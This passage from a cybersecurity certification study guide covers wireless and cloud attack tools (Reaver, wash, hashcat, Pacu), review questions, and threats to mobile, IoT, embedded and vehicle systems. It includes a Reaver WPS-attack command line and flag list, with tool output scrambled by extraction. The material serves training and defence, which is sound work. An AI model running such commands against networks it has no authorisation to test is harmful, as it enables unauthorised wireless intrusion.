-r, --recurring-delay=<x:y>
every x pin
attempts
-t, --timeout=<seconds>
timeout period [10]
-T, --m57-timeout=<seconds>
period [0.40]
-A, --no-associate
the AP
Quit after num pin
Set the time to sleep
Sleep for y seconds
Set the receive
Set the M5/M7 timeout
Do not associate with
(association must be
done by another
-N, --no-nacks
messages when out
application)
Do not send NACK
of order packets are
received
-S, --dh-small
improve crack
-L, --ignore-locks
reported by the
-E, --eap-terminate
session with an
-J, --timeout-is-nack
(DIR-300/320)
-F, --ignore-fcs
errors
-w, --win7
Use small DH keys to
speed
Ignore locked state
target AP
Terminate each WPS
EAP FAIL packet
Treat timeout as NACK
Ignore frame checksum
Mimic a Windows 7
registrar [False]
-K, --pixie-dust
-Z
Run pixiedust attack
Run pixiedust attack
Example:
reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv
The Reaver package contains other tools as well. Example 4-4
shows the arguments for the wash command of the Wi-Fi
Protected Setup Scan Tool. For more information on Reaver,
see https://tools.kali.org/wireless-attacks/reaver.
Example 4-4 wash: Wi-Fi Protected Setup Scan Tool
Click here to view code image
root@kali:~# wash -h
Wash v1.6.5 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig
Heffner
Required Arguments:
-i, --interface=<iface>
capture packets
-f, --file [FILE1 FILE2 FILE3 ...]
from capture
Interface to
on
Read packets
files
Optional Arguments:
-c, --channel=<num>
listen on [auto]
-n, --probes=<num>
of probes
Channel to
Maximum number
to send to each
AP in scan
mode [15]
-F, --ignore-fcs
checksum errors
-2, --2ghz
Ignore frame
Use 2.4GHz
802.11 channels
-5, --5ghz
channels
-s, --scan
-u, --survey
[default]
-a, --all
even those
-j, --json
WPS info as
-U, --utf8
(does not
Use 5GHz 802.11
Use scan mode
Use survey mode
Show all APs,
without WPS
print extended
json
Show UTF8 ESSID
sanitize ESSID,
dangerous)
-h, --help
Show help
Example:
wash -i wlan0mon
oclHashcat
oclHashcat is a general-purpose computing on graphics
processing units (GPGPU)-based multi-hash cracker using a
brute-force attack. All versions have now been updated and are
simply called hashcat. In GPGPU, the graphics processor is
tasked with running the algorithms that crack the hashes. The
cracking of a hash is shown in Figure 4-12.
Figure 4-12 oclHashcat
CLOUD INFRASTRUCTURE ASSESSMENT
TOOLS
As moving assets to the cloud becomes the rule and not the
exception, identifying and mitigating vulnerabilities in cloud
environments steadily increase in importance. There are several
monitoring and attack tools with which you should be familiar.
ScoutSuite
ScoutSuite is a data collection tool that allows you to use what
are called longitudinal survey panels to track and monitor the
cloud environment. It is open source and utilizes APIs made
available by the cloud provider. The following cloud providers
are currently supported/planned:
Amazon Web Services (AWS)
Microsoft Azure
Google Cloud Platform
Alibaba Cloud (alpha)
Oracle Cloud Infrastructure (alpha)
Prowler
AWS Security Best Practices Assessment, Auditing, Hardening
and Forensics Readiness Tool, also called Prowler, allows you
to run reports of various types. These reports list gaps found
between your practices and best practices of AWS as stated in
CIS Amazon Web Services Foundations Benchmark 1.1.
Figure 4-13 shows partial sample report results. Notice that the
results are color coded to categorize any gaps found.
Figure 4-13 Prowler
Pacu
Exploit frameworks are packages of tools that provide a bed for
creating and launching attacks of various types. One of the more
famous of these is Metasploit. Pacu is an exploit framework
used to assess and attack AWS cloud environments. Using plugin modules, it assists an attacker in
Enumeration
Privilege escalation
Data exfiltration
Service exploitation
Log manipulation
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 4-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 4-2 Key Topics in Chapter 4
Key Topic Element
Description
Page Number
Bulleted
list
Software development life cycle (SDLC)
7
2
Bulleted
list
Approaches to static code review
7
3
Bulleted
list
Code review types
7
3
Bulleted
list
Approaches to dynamic testing
7
4
Bulleted
list
Fuzz testing types
7
5
Bulleted
list
TCP flags
7
6
Bulleted
list
Nmap scan types
7
7
Example
4-1
FIN scan using nmap
7
8
Figure 4-8
Host scan with nmap
8
0
Bulleted
list
Operations possible with hping
8
0
Figure 4-9
SYN flood
8
1
Figure 410
Capturing authentication hashes with
Responder
8
2
Bulleted
list
Uses for Aircrack-ng
8
3
Example
4-3
Reaver: Wi-Fi Protected Setup Attack Tool
8
4
Example
4-4
wash: Wi-Fi Protected Setup Scan Tool
8
5
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
web vulnerability scanners
synthetic transaction monitoring
real user monitoring (RUM)
Burp Suite
OWASP Zed Attack Proxy (ZAP)
Nikto
Arachni
Nessus Professional
OpenVAS
Qualys
software development life cycle (SDLC)
static code analysis
dynamic analysis
reverse engineering
fuzzing
enumeration
Nmap
Null scan
FIN scan
XMAS scan
host scanning
SYN flood
active enumeration
passive enumeration
Responder
Aircrack-ng
Reaver
oclHashcat
ScoutSuite
Prowler
Pacu
REVIEW QUESTIONS
1. The
_________________________________________
_______ produces an interception proxy called ZAP.
2. Match the tool on the left with its definition on the right.
Tool
s
B
ur
p
Definitions
An interception proxy produced by OWASP
N
ik
to
A Ruby framework for assessing the security of a web
application
Z
A
P
Vulnerability scanner that is dedicated to web servers
A
ra
c
h
ni
Can scan an application for vulnerabilities and can also be
used to crawl an application (to discover content)
3. List at least one of the advantages of the cloud-based
approach to vulnerability scanning.
4. Arrange the following steps of the SDLC in the proper order.
Gather requirements
Certify/accredit
Release/maintain
Design
Test/validate
Perform change management and configuration
management/replacement
Develop
Plan/initiate project
5. ________________________ analysis is done without
the code executing.
6. List at least one form of static code review.
7. Match the type of code review on the left with its definition
on the right.
Review Types
Definitions
Reverse
engineering
Injecting invalid or unexpected input
Fuzzing
Analyzing a subject system to identify the
system’s components and their
interrelationships
Real user
monitoring
Running scripted transactions against an
application
Synthetic
transaction
monitoring
Monitoring method that captures and analyzes
every transaction
8. List at least one measure that can help prevent fault
injection attacks.
9. Match the following tools with their definitions.
Tool
s
Definitions
n
m
a
p
Used to attack Wi-Fi Protected Setup (WPS)
h
pi
n
g
Tool that can be used for answering NBT and LLMNR name
requests
R
es
p
o
Command-line-oriented TCP/IP packet assembler/analyzer
n
d
er
R
ea
ve
r
When used for scanning, it typically locates the devices,
locates the open ports on the devices, and determines the
OS on each host
10. List at least one of the cloud platforms supported by
ScoutSuite.
Chapter 5
Threats and Vulnerabilities
Associated with Specialized
Technology
This chapter covers the following topics related to Objective 1.5
(Explain the threats and vulnerabilities associated with
specialized technology) of the CompTIA Cybersecurity Analyst
(CySA+) CS0-002 certification exam:
Mobile: Discusses threats specific to the mobile environment.
Internet of Things (IoT): Covers threats specific to the IoT.
Embedded: Describes threats specific to embedded systems.
Real-time operating system (RTOS): Covers threats specific to
an RTOS.
System-on-Chip (SoC): Investigates threats specific to an SoC.
Field programmable gate array (FPGA): Covers threats
specific to FPGAs.
Physical access control: Discusses threats specific to physical
access control systems.
Building automation systems: Covers threats specific to
building automation systems.
Vehicles and drones: Describes threats specific to vehicles and
drones.
Workflow and process automation systems: Covers threats
specific to workflow and process automation systems.
Incident Command System (ICS): Discusses the use of ICS.
Supervisory control and data acquisition (SCADA): Covers
systems that operate with coded signals over communication
channels to provide control of remote equipment.
In some cases, the technologies that we create and develop to
enhance our ability to control the environment and to automate
processes create security issues. As we add functionality, we
almost always increase the attack surface. This chapter
describes specific issues that are unique to certain scenarios and
technologies.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these 12 self-assessment questions, you might want
to skip ahead to the “Exam Preparation Tasks” section. Table 51 lists the major headings in this chapter and the “Do I Know
This Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 5-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Question
Mobile
1
Internet of Things (IoT)
2
Embedded
3
Real-Time Operating System (RTOS)
4
System-on-Chip (SoC)
5
Field Programmable Gate Array (FPGA)
6
Physical Access Control
7
Building Automation Systems
8
Vehicles and Drones
9
Workflow and Process Automation Systems
10
Incident Command System (ICS)
11
Supervisory Control and Data Acquisition (SCADA)
12
1. Which of the following is a specification first used in late
2001 that allows USB devices, such as tablets and
smartphones, to act as either a USB host or a USB device?
1. USB pass-through
2. USB-OTG
3. Ready Boost
4. Lo Jack
2. Which of the following is not one of the five categories of
IoT deployments?
1. LAN base
2. Smart home
3. Wearables
4. Connected cars
3. Which of the following describes a piece of software that is
built into a larger piece of software and is in charge of
performing some specific function on behalf of the larger
system?
1. Proprietary
2. Legacy
3. Embedded
4. Linked
4. VxWorks 6.5 is an example of a(n) _______________
system?
1. Modbus
2. embedded
3. RTOS
4. legacy
5. Which of the following is an example of a SoC that manages
all the radio functions in a network interface?
1. Dual-core processor
2. Broadband processor
3. Baseband processor
4. Hyper-processor
6. An FPGA is an example of which of the following?
1. SoC
2. PLD
3. PGA
4. Hypervisor
7. Which of the following is a series of two doors with a small
room between them?
1. Turnstile
2. Bollard
3. Mantrap
4. Moat
8. Which of the following is an application, network, and
media access control (MAC) layer communications service
used in HVAC systems?
1. BACnet
2. Modbus
3. CAN bus
4. BAP
9. Which of the following is designed to allow vehicle
microcontrollers and devices to communicate with each
other’s applications without a host computer?
1. CAN bus
2. ZigBee
3. Modbus
4. BAP
10. Which of the following is a tool used to automate network
functions?
1. DMVPN
2. Puppet
3. Net DNA
4. Modbus
11. Which of the following provides guidance for how to
organize assets to respond to an incident (system
description) and processes to manage the response through
its successive stages (concept of operations)?
1. ICS
2. DMVPN
3. IEE
4. IoT
12. Which of the following industrial control system
components connect to the sensors and convert sensor data
to digital data, including telemetry hardware?
1. PLCs
2. RTUs
3. BUS link
4. Modbus
FOUNDATION TOPICS
MOBILE
In today’s world, seemingly everyone in the workplace has at
least one mobile device. But with the popularity of mobile
devices has come increasing security issues for security
professionals. The increasing use of mobile devices combined
with the fact that many of these devices connect using public
networks with little or no security provides security
professionals with unique challenges.
Educating users on the risks related to mobile devices and
ensuring that they implement appropriate security measures
can help protect against threats involved with these devices.
Some of the guidelines that should be provided to mobile device
users include implementing a device-locking PIN, using device
encryption, implementing GPS location, and implementing
remote wipe. Also, users should be cautioned on downloading
apps without ensuring that they are coming from a reputable
source. In recent years, mobile device management
(MDM) and mobile application management (MAM) systems
have become popular in enterprises. They are implemented to
ensure that an organization can control mobile device settings,
applications, and other parameters when those devices are
attached to the enterprise network.
The threats presented by the introduction of personal mobile
devices (smartphones and tablets) to an organization’s network
include the following:
Insecure web browsing
Insecure Wi-Fi connectivity
Lost or stolen devices holding company data
Corrupt application downloads and installations
Missing security patches
Constant upgrading of personal devices
Use of location services
While the most common types of corporate information stored
on personal devices are corporate emails and company contact
information, it is alarming to note that some surveys show
almost half of these devices also contain customer data, network
login credentials, and corporate data accessed through business
applications.
To address these issues and to meet the rising demand by
employees to bring personal devices into the workplace and use
them for both work and personal purposes, many organizations
are creating bring your own device (BYOD) policies. As a
security professional, when supporting a BYOD initiative, you
should take into consideration that you probably have more to
fear from the carelessness of the users than you do from
hackers. Not only are they less than diligent in maintaining
security updates and patches on devices, they buy new devices
frequently to get the latest features. These factors make it
difficult to maintain control over the security of the networks in
which these devices are allowed to operate.
Centralized mobile device management tools are becoming the
fastest-growing solution for both organization-issued and
personal mobile devices. Some solutions leverage the messaging
server’s management capabilities, and others are third-party
tools that can manage multiple brands of devices. One example
is Systems Manager by Cisco that integrates with its Cisco
Meraki cloud services. Another example is the Apple
Configurator for iOS devices. One of the challenges with
implementing such a system is that not all personal devices may
support native encryption and/or the management process.
Typically, centralized MDM tools handle organization-issued
and personal mobile devices differently. For organization-issued
devices, a client application typically manages the configuration
and security of the entire device. If the device is a personal
device allowed through a BYOD initiative, the application
typically manages the configuration and security of itself and its
data only. The application and its data are sandboxed from the
other applications and data. The result is that the organization’s
data is protected if the device is stolen, while the privacy of the
user’s data is also preserved.
In Chapter 9, “Software Assurance Best Practices,” you will
learn about best practices surrounding the use of mobile
devices. The sections that follow look at some additional
security challenges posed by mobile devices.
Unsigned Apps/System Apps
Unsigned applications represent code that cannot be verified to
be what it purports to be or to be free of malware. While many
unsigned applications present absolutely no security issues,
most enterprises wisely chose to forbid their installation. MDM
software and security settings in the devices themselves can be
used to prevent this.
System apps are those that come preinstalled on the device.
While these apps probably present no security issue, some of
them run all the time, so it might be beneficial to remove them
to save space and to improve performance. The organization
also might decide that removing some system apps is necessary
to disable features in these apps that can disclose information
about the user or the device that could lead to a social
engineering attack. By following the instructions on the vendor
site, these apps can be removed.
Security Implications/Privacy Concerns
Security issues are inherent in mobile devices. Many of these
vulnerabilities revolve around storage devices. Let’s look at a
few.
Data Storage
While protecting data on a mobile device is always a good idea,
in many cases an organization must comply with an external
standard regarding the minimum protection provided to the
data on the storage device. For example, the Payment Card
Industry Data Security Standard (PCI DSS) enumerates
requirements that payment card industry players must meet to
secure and monitor their networks, protect cardholder data,
manage vulnerabilities, implement strong access controls, and
maintain security policies. Various storage types share certain
issues and present issues unique to the type.
Nonremovable Storage
The storage that is built into the device might not suffer all the
vulnerabilities shared by other forms but is still data at risk.
One tool at our disposal with this form of storage that is not
available with others is the ability to remotely wipe the data if
the device is stolen. At any rate, the data should be encrypted
with AES 128/256-bit encryption. Also, be sure to have a
backup copy of the data stored in a secure location.
Removable Storage
While removable storage may be desirable in that it may not be
stolen if the device is stolen, it still can be lost and stolen itself.
Removable storage of any type represents one of the primary
ways data exfiltration occurs. If removable storage is in use, the
data should be encrypted with AES 128/256-bit encryption.
Transfer/Back Up Data to Uncontrolled Storage
In some cases users store sensitive data in cloud storage that is
outside the control of the organization, using sites such as
Dropbox. These storage providers have had their share of data
loss issues as well. Policies should address and forbid this type
of storage of data from mobile devices.
USB OTG
USB On-The-Go (USB OTG) is a specification first used in
late 2001 that enables USB devices, such as tablets and
smartphones, to act as either a USB host or a USB device. With
respect to smartphones, USB OTG has been used to hack
around an iPhone security feature that requires a valid iPhone
username and password to use a device after a factory reset.
This feature is supplied to prevent the use of a stolen
smartphone that has been reset to factory defaults, but it can be
defeated with a hack using USB OTG.
Device Loss/Theft
Of course, one the biggest threats to organizations is a lost or
stolen device containing irreplaceable or sensitive data.
Organizations should ensure that they can remotely wipe the
device when this occurs. Moreover, polices should require that
corporate data be backed up to a server so that a remote wipe
does not delete data that only resides in the device.
Rooting/Jailbreaking
While rooting or jailbreaking a device enables the user to
remove some of the restrictions of the device, it also presents
security issues. Jailbreaking removes the security restrictions
on your iPhone or iPad. This means apps are given access to the
core functions of the device, which normally requires the user
consent. It also allows the installation of apps not found in the
Apple Store. One of the reasons those apps are not in the Apple
Store is that they are either insecure or malware masquerading
as a legitimate app. Finally, a rooted or jailbroken device
receives no security updates, making it even more vulnerable.
Push Notification Services
Push notification services allow unsolicited messages to be
sent by an application to a mobile device even when the
application is not open on the device. Although these services
can be handy, there are some security best practices when
developing these services for your organization:
Do not send company confidential data or intellectual property in
the message payload.
Do not store your SSL certificate and list of device tokens in your
web-root.
Be careful not to inadvertently expose APN (Apple) certificates or
device tokens.
Geotagging
Geotagging is the process of adding geographical
identification metadata to various media and is enabled by
default on many smartphones (to the surprise of some users). In
many cases, this location information can be used to locate
where images, video, websites, and SMS messages originate. At
the very least, this information can be used to assemble a social
engineering attack. This information has been used in the past
to reveal the location of high-valued goods. In an extreme case,
four U.S. Army Apache helicopters were destroyed (on the
ground) by the enemy after they were able to pinpoint the
helicopters’ location through geotagged photos taken by U.S.
soldiers and posted on the Internet.
OEM/Carrier Android Fragmentation
Android fragmentation refers to the overwhelming number of
versions of Android that have been sold. The primary issue is
that many users are still running an older version for which
security patches are no longer available. The fault is typically
that of the phone manufacturer for either maintaining use of an
operating system when a new one is available or by customizing
the OS (remember, Android is open source) so much that the
security patches are incompatible. Organizations should
consider these issues when choosing a phone manufacturer.
Mobile Payment
One of the latest features of smartphones is the ability to pay for
items using the smartphone instead of a credit card. There are
various technologies used to make this possible and they have
attendant security issues. Let’s look at how these technologies
work.
NFC Enabled
A new security issue facing both merchants and customers is the
security of payment cards that use near field
communication (NFC), such Apple Pay and Google Pay.
NFC is a short-range type of wireless transmission and is
therefore difficult to capture. Moreover, these transmissions are
typically encrypted. However, interception is still possible. In
any case, some steps can be taken to secure these payment
mechanisms:
Lock the mobile device. Devices must be turned on or unlocked
before they can read any NFC tags.
Turn off NFC when not in use.
For passive tags, use an RFID/NFC-blocking device.
Scan mobile devices for unwanted apps, spyware, and other threats
that may siphon information from your payment apps.
Inductance Enabled
Inductance is the process used in NFC to transmit the
information from the smartphone to the reader. Coils made of
ferrite material use electromagnetic induction to transmit
information. Therefore, an inductance-enabled device would be
one that supports a mobile payment system. While capturing
these transmissions is possible, the attacker must be very close.
Mobile Wallet
An alternative technology used in mobile payment systems is
the Mobile Wallet used by online companies like PayPal,
Amazon Payments, and Google Pay. In this system, the user
registers his card number and is issued a PIN, which he uses to
authorize payments. The PIN identifies the user and the card
and charges the card.
Peripheral-Enabled Payments (Credit Card Reader)
Credit card readers that can read from a mobile phone at close
range are also becoming ubiquitous, especially with merchants
that operate in remote locations such as cabs, food trucks, and
flea markets. Figure 5-1 shows one such device reading a card.
Figure 5-1 Peripheral-Enabled Payments (Credit Card
Reader)
USB
Since this connection uses bounded media, this may be the
safest way to make a connection. The only way a malicious
individual could make this kind of connection will be to gain
physical access to the mobile device. So physical security is the
main way to mitigate this.
Malware
Just like laptops and desktops, mobile devices are targets of
viruses and malware. Major antivirus vendors such as McAfee
and Kaspersky make antivirus and anti-malware products for
mobile devices that provide the same real-time protection that
the similar products do for desktops. The same guideline that
applies to computers applies to mobile devices: keep the
antivirus/anti-malware product up to date by setting the device
to check for updates whenever connected to the Internet.
Unauthorized Domain Bridging
Most smartphones can act as a wireless hotspot. When a device
that has been made a member of the domain and then acts as a
hotspot, it allows access to the organizational network to
anyone using the hotspot. This is called unauthorized domain
bridging and should be forbidden. There is software that can
prevent this. In several embodiments, software operative on the
network allows activation of only a single communications
adapter while inactivating all other communications adapters
installed on each computer authorized to access the network.
SMS/MMS/Messaging
Short Message Service (SMS) is a text messaging service
component of most telephone, World Wide Web, and mobile
telephony systems. Multimedia Messaging Service (MMS)
handles messages that include graphics or videos. Both
technologies present security challenges. Because messages are
sent in clear text, both are susceptible to spoofing and
spamming.
INTERNET OF THINGS (IOT)
The Internet of Things (IoT) refers to a system of
interrelated computing devices, mechanical and digital
machines, and objects that are provided with unique identifiers
and the ability to transfer data over a network without requiring
human-to-human or human-to-computer interaction. The IoT
has presented attackers with a new medium through which to
carry out an attack. Often the developers of the IoT devices add
the IoT functionality without thoroughly considering the
security implications of such functionality or without building
in any security controls to protect the IoT devices.
Note
IoT is a term for all physical objects, or “things,” that are now embedded with
electronics, software, and network connectivity. Thanks to the IoT, these objects
—including automobiles, kitchen appliances, and heating and air conditioning
controllers—can collect and exchange data. Unfortunately, engineers give most
of these objects this ability just for convenience and without any real
consideration of the security impacts. When these objects are then deployed,
consumers do not think of security either. The result is consumer convenience
but also risk. As the IoT evolves, security professionals must be increasingly
involved in the IoT evolution to help ensure that security controls are designed to
protect these objects and the data they collect and transmit.
IoT Examples
IoT deployments include a wide variety of devices, but are
broadly categorized into five groups:
Smart home: Includes products that are used in the home. They
range from personal assistance devices, such as Amazon Alexa, to
HVAC components, such as Nest thermostats. These devices are
designed for home management and automation.
Wearables: Includes products that are worn by users. They range
from watches, such as the Apple Watch, to personal fitness devices,
like the Fitbit.
Smart cities: Includes devices that help resolve traffic congestion
issues and reduce noise, crime, and pollution. They include smart
energy, smart transportation, smart data, smart infrastructure, and
smart mobility devices.
Connected cars: Includes vehicles that include Internet access
and data sharing capabilities. Technologies include GPS devices,
OnStar, and AT&T connected cars.
Business automation: Includes devices that automate HVAC,
lighting, access control, and fire detection for organizations.
Methods of Securing IoT Devices
Security professionals must understand the different methods
of securing IoT devices. The following are some
recommendations:
Secure and centralize the access logs of IoT devices.
Use encrypted protocols to secure communication.
Create secure password policies.
Implement restrictive network communications policies, and set up
virtual LANs.
Regularly update device firmware based on vendor
recommendations.
When selecting IoT devices, particularly those that are
implemented at the organizational level, security professionals
need to look into the following:
Does the vendor design explicitly for privacy and security?
Does the vendor have a bug bounty program and vulnerability
reporting system?
Does the device have manual overrides or special functions for
disconnected operations?
EMBEDDED SYSTEMS
An embedded system is a piece of software that is built into a
larger piece of software and is in charge of performing some
specific function on behalf of the larger system. The embedded
part of the solution might address specific hardware
communications and might require drivers to talk between the
larger system and some specific hardware. For more
information, see Chapter 9.
REAL-TIME OPERATING SYSTEM (RTOS)
Real-time operating systems (RTOSs) are designed to
process data as it comes in, typically without buffer delays. Like
all systems, they have a certain amount of latency in the
processing. One of the key issues with these systems is to
control the jitter (the variability of such latency).
Many IoT devices use an RTOS. These operating systems were
not really designed for security and some issues have surfaced.
For example, VxWorks 6.5 and later versions have found to be
susceptible to a vulnerability that allows remote attackers full
control over targeted devices. The ARMIS security firm
discovered and announced 11 vulnerabilities, including six
critical vulnerabilities, collectively branded URGENT/11 in the
summer of 2019. This is disturbing, because VxWorks is used in
mission-critical systems for the enterprise, including SCADA,
elevator, and industrial controllers, as well as in healthcare
equipment, including patient monitors and MRI scanners.
SYSTEM-ON-CHIP (SOC)
System-on-Chip (SoC) has become typical inside cell phone
electronics for its reduced energy use. A baseband processor is a
chip in a network interface that manages all the radio functions.
A baseband processor typically uses its own RAM and firmware.
Since the software that runs on baseband processors is usually
proprietary, it is impossible to perform an independent code
audit. In March 2014, makers of the free Android derivative
Replicant announced they had found a backdoor in the
baseband software of Samsung Galaxy phones that allows
remote access to the user data stored on the phone. Although it
has been some time since this happened, it is a reminder that
SoCs can be a security issue.
FIELD PROGRAMMABLE GATE ARRAY
(FPGA)
A programmable logic device (PLD) is an integrated circuit with
connections or internal logic gates that can be changed through
a programming process. A field programmable gate array
(FPGA) is a type of PLD that is programmed by blowing fuse
connections on the chip or using an antifuse that makes a
connection when a high voltage is applied to the junction.
FPGAs are used extensively in IoT implementations and in
cloud scenarios. In 2019, scientists discovered a vulnerability in
FPGAs. In a side-channel attack, cyber criminals use the energy
consumption of the chip to retrieve information that allows
them to break its encryption. It is also possible to tamper with
the calculations or even to crash the chip altogether, possibly
resulting in data losses.
PHYSICAL ACCESS CONTROL
Access control is all about using physical or logical controls to
control who or what has access to a network, system, or device.
It also involves what type of access is given to the information,
network, system, device, or facility. Access control is primarily
provided using physical and logical controls.
Physical access focuses on controlling access to a network,
system, or device. In most cases, physical access involves using
access control to prevent users from being able to touch
network components (including wiring), systems, or devices.
While locks are the most popular physical access control
method to preventing access to devices in a data center, other
physical controls, such as guards and biometrics, should also be
considered, depending on the needs of the organization and the
value of the asset being protected.
When installing an access control system, security professionals
should understand who needs access to the asset being
protected and how those users need to access the asset. When
multiple users need access to an asset, the organization should
set up a multilayer access control system. For example, users
wanting access to the building may only need to sign in with a
security guard. However, to access the locked data center within
the same building, users would need a smart card. Both of these
would be physical access controls. To protect data on a single
server within the building (but not in the data center), the
organization would need to deploy such mechanisms as
authentication, encryption, and access control lists (ACLs) as
logical access controls but could also place the server in a locked
server room to provide physical access control. When deploying
physical and logical access controls, security professionals must
understand the access control administration methods and the
different assets that must be protected and their possible access
controls.
Systems
To fully protect the systems used by the organization, including
client and server computers, security professionals may rely on
both physical and logical access controls. However, some
systems, like client computers, may be deployed in such a
manner that only minimal physical controls are used. If a user is
granted access to a building, he or she may find client
computers being used in nonsecure cubicles throughout the
building. For these systems, a security professional must ensure
that the appropriate authentication mechanisms are deployed.
If confidential information is stored on the client computers,
encryption should also be deployed. But only the organization
can best determine which controls to deploy on individual client
computers. When it comes to servers, determining which access
controls to deploy is usually a more complicated process.
Security professionals should work with the server owner,
whether it is a department head or an IT professional, to
determine the value of the asset and the needed protection. Of
course, most servers should be placed in a locked room. In
many cases, this will be a data center or server room. However,
servers can be deployed in regular locked offices if necessary. In
addition, other controls should be deployed to ensure that the
system is fully protected. The access control needs of a file
server are different from those of a web server or database
server. It is vital that the organization perform a thorough
assessment of the data that is being processed and stored on the
system before determining which access controls to deploy. If
limited resources are available, security professionals must
ensure that their most important systems have more access
controls than other systems.
Devices
As with systems, physical access to devices is best provided by
placing the devices in a secure room. Logical access to devices is
provided by implementing the appropriate ACL or rule list,
authentication, and encryption, as well as securing any remote
interfaces that are used to manage the device. In addition,
security professionals should ensure that the default accounts
and passwords are changed or disabled on the device. For any
IT professionals that need to access the device, a user account
should be configured for the professional with the appropriate
level of access needed. If a remote interface is used, make sure
to enable encryption, such as SSL, to ensure that
communication via the remote interface is not intercepted and
read. Security professionals should closely monitor vendor
announcements for any devices to ensure that the devices are
kept up to date with the latest security patches and firmware
updates.
Facilities
With facilities, the primary concern is physical access, which
can be provided using locks, fencing, bollards, guards, and
closed-circuit television (CCTV). Many organizations think that
such measures are enough. But with today’s advanced industrial
control systems and the IoT, organizations must also consider
any devices involved in facility security. If an organization has
an alarm/security system that allows remote viewing access
from the Internet, the appropriate logical controls must be in
place to prevent a malicious user from accessing the system and
changing its settings or from using the system to gain inside
information about the facility layout and day-to-day operations.
If the organization uses an industrial control system (ICS),
logical controls should also be a priority. Security professionals
must work with organizations to ensure that physical and
logical controls are implemented appropriately to ensure that
the entire facility is protected.
Note
There are two “ICSs” covered in this chapter. It can mean either industrial
control system (ICS) or Incident Command System (ICS).
Physical access control systems are any systems used to allow or
deny physical access to the facility. Examples include the
following:
Mantrap: This is a series of two doors with a small room between
them. The user is authenticated at the first door and then allowed
into the room. At that point, additional verification occurs (such as
a guard visually identifying the person), and then the person is
allowed through the second door. Mantraps are typically used only
in very high-security situations. They can help prevent tailgating.
Figure 5-2 illustrates a mantrap design.
Figure 5-2 Mantrap
Proximity readers: These readers are door controls that read a
proximity card from a short distance and are used to control access
to sensitive rooms. These devices can also provide a log of all entries
and exits.
IP-based access control and video systems: When using these
systems, a network traffic baseline for each system should be
developed so that unusual traffic can be detected.
Some higher-level facilities are starting to incorporate
biometrics as well, especially in high-security environments
where terrorist attacks are a concern.
BUILDING AUTOMATION SYSTEMS
The networking of facility systems has enhanced the ability to
automate the management of systems, including the following:
Lighting
HVAC
Water systems
Security alarms
Bringing together the management of these seemingly disparate
systems allows for the orchestration of their interaction in ways
that were never before possible. When industry leaders discuss
the IoT, the success of building automation is often used as a
real example of where connecting other devices, such as cars
and street signs, to the network can lead. These systems usually
can pay for themselves in the long run by managing the entire
ecosystem more efficiently in real time than a human could ever
do. If a wireless version of such a system is deployed, keep the
following issues in mind:
Interference issues: Construction materials may prevent you
from using wireless everywhere.
Security: Use encryption, separate the building automation
systems (BAS) network from the IT network, and prevent routing
between the networks.
Power: When Power over Ethernet (PoE) cannot provide power to
controllers and sensors, ensure that battery life supports a
reasonable lifetime and that procedures are created to maintain
batteries.
IP Video
IP video systems provide a good example of the benefits of
networking applications. These systems can be used for both
surveillance of a facility and facilitating collaboration. An
example of the layout of an IP surveillance system is shown in
Figure 5-3.
FIGURE 5-3 IP Surveillance
IP video has also ushered in a new age of remote collaboration.
It has saved a great deal of money on travel expenses while at
the same time making more efficient use of time.
Issues to consider and plan for when implementing IP video
systems include the following:
Expect a large increase in the need for bandwidth.
QoS needs to be configured to ensure performance.
Storage needs to be provisioned for the camera recordings. This
could entail cloud storage, if desired.
The initial cost may be high.
HVAC Controllers
One of the best examples of the marriage of IP networks and a
system that formerly operated in a silo is the heating,
ventilation, and air conditioning (HVAC) system. HVAC
systems usually use a protocol called Building Automation
and Control Networks (BACnet), which is an application,
network, and media access control (MAC) layer
communications service. It can operate over a number of Layer
2 protocols, including Ethernet.
To use the BACnet protocol in an IP world, BACnet/IP (B/IP)
was developed. The BACnet standard makes exclusive use of
MAC addresses for all data links, including Ethernet. To
support IP, IP addresses are needed. BACnet/IP, Annex J,
defines an equivalent MAC address composed of a 4-byte IP
address followed by a 2-byte UDP port number. A range of 16
UDP port numbers has been registered as hexadecimal BAC0
through BACF.
While putting HVAC systems on an IP network makes them
more manageable, it has become apparent that these networks
should be separate from the internal network. In the infamous
Target breach, hackers broke into the network of a company
that managed the company’s HVAC systems. The intruders
leveraged the trust and network access granted to the HVAC
company by Target and then, from these internal systems, broke
into the point-of-sale systems and stole credit and debit card
numbers, as well as other personal customer information.
Sensors
Sensors are designed to gather information of some sort and
make it available to a larger system, such as an HVAC
controller. Sensors and their role in SCADA systems are covered
later in this chapter.
VEHICLES AND DRONES
Wireless capabilities added to vehicles and drones have ushered
in a new world of features, while at the same time opening the
door for all sorts of vulnerabilities common to any networkconnected device.
Connected vehicles are not those that drive themselves,
although those are coming. A connected vehicle is one that can
be reached with a wireless connection of some sort. MacAfee
has identified the attack surface that exists in a connected
vehicle. Figure 5-4 shows the areas of vulnerability.
Figure 5-4 Vehicle Attack Surface
As you can see in Figure 5-4, critical vehicle systems may be
vulnerable to wireless attacks.
CAN Bus
While autonomous vehicles may still be a few years off, when
they arrive they will make use of a new standard for vehicle-tovehicle and vehicle-to-road communication. Controller Area
Network (CAN bus) is designed to allow vehicle
microcontrollers and devices to communicate with each other’s
applications without a host computer. Sounds great, huh?
It turns out CAN is a low-level protocol and does not support
any security features intrinsically. There is also no encryption in
standard CAN implementations, which leaves these networks
open to data interception.
Failure by vendors to implement their own security measures
may result in attacks if attackers manage to insert messages on
the bus. While passwords exist for some safety-critical
functions, such as modifying firmware, programming keys, or
controlling antilock brake actuators, these systems are not
implemented universally and have a limited number of
seed/key pairs (meaning a brute-force attack is more likely to
succeed). Hopefully, an industry security standard for the CAN
bus will be developed at some point.
Drones
Drones are managed wirelessly and, as such, offer attackers the
